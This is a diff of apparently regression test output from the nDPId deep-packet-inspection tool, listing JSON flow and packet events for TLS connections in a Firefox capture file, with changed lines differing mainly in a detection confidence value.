00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998806,"flow_last_seen":1620927998806,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998806,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620927998806,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998806,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmEAbtCftk8AAAAALAC\/\/\/03wAAAgQFtAEDAwUBAQgKNAyYeQAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620927998817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yX\/JSxfE3khkHaAS\/oi4VgAAAgQFrAQCCAo8IAs5NAyYZQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620927998817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl\/AbveSGQdyUsXxYAQECzVWgAAAQEICjQMmII8IAs5"} -00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620927998833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yYRFBnlrQn7ZPaAS\/ogBdQAAAgQFrAQCCAo8IAtKNAyYeQEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620927998833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmEAbtCftk9RQZ5bIAQECwefwAAAQEICjQMmJA8IAtK"} -00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999109,"flow_last_seen":1620927999109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999109,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620927999109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999109,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmPAbugsPXqAAAAALAC\/\/947AAAAgQFtAEDAwUBAQgKNAyZgQAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999111,"flow_last_seen":1620927999111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999111,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -30,18 +30,18 @@ 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmQAbsCvXBxSS7VUoAQECxktgAAAQEICjQMmZw8IAx6"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620927999140,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999140,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZFyBGfZy0T4r6AS\/og7hgAAAgQFrAQCCAo8IAx9NAyZgwEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620927999140,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999140,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmRAbvLRPivcgRn2oAQECxYiwAAAQEICjQMmZ88IAx9"} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 